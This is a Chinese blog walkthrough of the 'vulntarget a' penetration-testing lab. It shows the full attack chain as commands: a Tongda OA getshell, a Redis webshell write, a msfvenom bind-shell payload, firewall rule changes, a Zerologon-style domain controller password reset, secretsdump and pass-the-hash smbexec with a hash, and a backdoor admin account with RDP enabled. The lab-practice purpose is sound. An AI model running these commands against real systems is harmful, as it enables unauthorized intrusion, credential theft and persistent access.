vulntarget a

常规操作,先扫

图片[1]-vulntarget a-魔法少女雪殇

,web端口,rpc,和445开放,看看web

图片[2]-vulntarget a-魔法少女雪殇

通达oa,工具尝试getshell

图片[3]-vulntarget a-魔法少女雪殇

cs上线

图片[4]-vulntarget a-魔法少女雪殇

挂代理走一波,发现就一个hello world,扫一下

图片[5]-vulntarget a-魔法少女雪殇
图片[6]-vulntarget a-魔法少女雪殇

扫到这个,暂时留着,nmap扫一下,发现开启了6379,也就是redis,直接连

图片[7]-vulntarget a-魔法少女雪殇

参考文章:Redis Getshell方法总结 – 天下大木头 (wjlshare.com)

用绝对路径写shell

图片[8]-vulntarget a-魔法少女雪殇
图片[9]-vulntarget a-魔法少女雪殇

访问c.php

图片[10]-vulntarget a-魔法少女雪殇
图片[11]-vulntarget a-魔法少女雪殇

发现仍是system权限。

图片[12]-vulntarget a-魔法少女雪殇

查看是否在域内

图片[13]-vulntarget a-魔法少女雪殇

查看域管理员

图片[14]-vulntarget a-魔法少女雪殇

ping一下,获得ip

图片[15]-vulntarget a-魔法少女雪殇

剩下就没啥了,还是直接上cs。

急了,cs第二层怎么都挂不上,急了,换msf

生成木马

msfvenom -p windows/x64/meterpreter/bind_tcp  LPORT=8091 -f exe > 8091_bind.exe

关闭服务器防火墙

netsh advfirewall firewall add rule name="bind tcp" protocol=TCP dir=in localport=8091 action=allow

msf开启监听。

图片[16]-vulntarget a-魔法少女雪殇
图片[17]-vulntarget a-魔法少女雪殇

拿到第二台主机的msf,获得密码

图片[18]-vulntarget a-魔法少女雪殇

添加一下路由,ip之前就知道了,主要是后续代理挂不上了,,,

run post/windows/manage/migrate

run post/multi/manage/autoroute

然后利用漏洞把密码制空

图片[19]-vulntarget a-魔法少女雪殇

然后dump出来impacket/secretsdump.py at master · SecureAuthCorp/impacket (github.com)

proxychains python3 secretsdump.py vulntarget.com/win2019\$@10.0.10.110 -no-pass

msf开启代理

msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 0.

[*] Starting the SOCKS proxy server

然后利用smbexec,拿到shell

proxychains python3 smbexec.py  -hashes ad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15 vulntarget.com/administrator@10.0.10.110
图片[20]-vulntarget a-魔法少女雪殇

创建新用户,然后开远程桌面

net user snowywar Admin@123 /add
命令成功完成。


C:\Windows\system32>net localgroup administrators snowywar/add
命令成功完成。
reg add "HKLM\System\CurrentControlSet\Control\TerminalServer\WinStations\RDP-Tcp" /t REG_DWORD /v portnumber /d 3389 /f
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow
图片[21]-vulntarget a-魔法少女雪殇

还是一样,上传木马然后转shell监听到msf内即可,还有关闭防火墙

netsh advfirewall firewall add rule name="bind tcp" protocol=TCP dir=in localport=8091 action=allow

最后拿下三台主机,通关

图片[22]-vulntarget a-魔法少女雪殇
图片[23]-vulntarget a-魔法少女雪殇
© 版权声明
THE END
喜欢就支持一下吧
点赞8 分享
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情